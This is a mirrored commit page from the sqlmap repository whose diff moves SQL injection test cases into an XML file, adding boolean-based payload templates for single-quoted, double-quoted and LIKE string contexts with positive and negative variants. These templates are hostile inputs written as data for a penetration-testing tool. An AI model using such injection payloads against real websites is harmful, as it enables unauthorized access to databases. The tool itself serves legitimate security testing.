mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2025-12-29 10:59:03 +00:00
moved injections to xml format
This commit is contained in:
@@ -15,15 +15,14 @@
|
||||
</case>
|
||||
<case tag="likesingle" desc="LIKE single quoted string">
|
||||
<positive format="%s'%s AND %s'%s' LIKE '%s" params="value, ")" * parenthesis, "(" * parenthesis, randStr, randStr"/>
|
||||
<negative format="" params=""/>
|
||||
<negative format="%s'%s AND %s'%s' LIKE '%s" params="value, ")" * parenthesis, "(" * parenthesis, randStr, randStr + randomStr(1)"/>
|
||||
</case>
|
||||
<case tag="custom" desc="custom">
|
||||
<positive format="" params=""/>
|
||||
<negative format="" params=""/>
|
||||
<case tag="stringdouble" desc="double quoted string">
|
||||
<positive format="%s\"%s AND %s\"%s\"=\"%s" params="value, ")" * parenthesis, "(" * parenthesis, randStr, randStr"/>
|
||||
<negative format="%s\"%s AND %s\"%s\"=\"%s" params="value, ")" * parenthesis, "(" * parenthesis, randStr, randStr + randomStr(1)"/>
|
||||
</case>
|
||||
<case tag="custom" desc="custom">
|
||||
<positive format="" params=""/>
|
||||
<negative format="" params=""/>
|
||||
<case tag="likedouble" desc="LIKE double quoted string">
|
||||
<positive format="%s\"%s AND %s\"%s\" LIKE \"%s" params="value, ")" * parenthesis, "(" * parenthesis, randStr, randStr"/>
|
||||
<negative format="%s\"%s AND %s\"%s\" LIKE \"%s" params="value, ")" * parenthesis, "(" * parenthesis, randStr, randStr + randomStr(1)"/>
|
||||
</case>
|
||||
|
||||
</root>
|
||||
Reference in New Issue
Block a user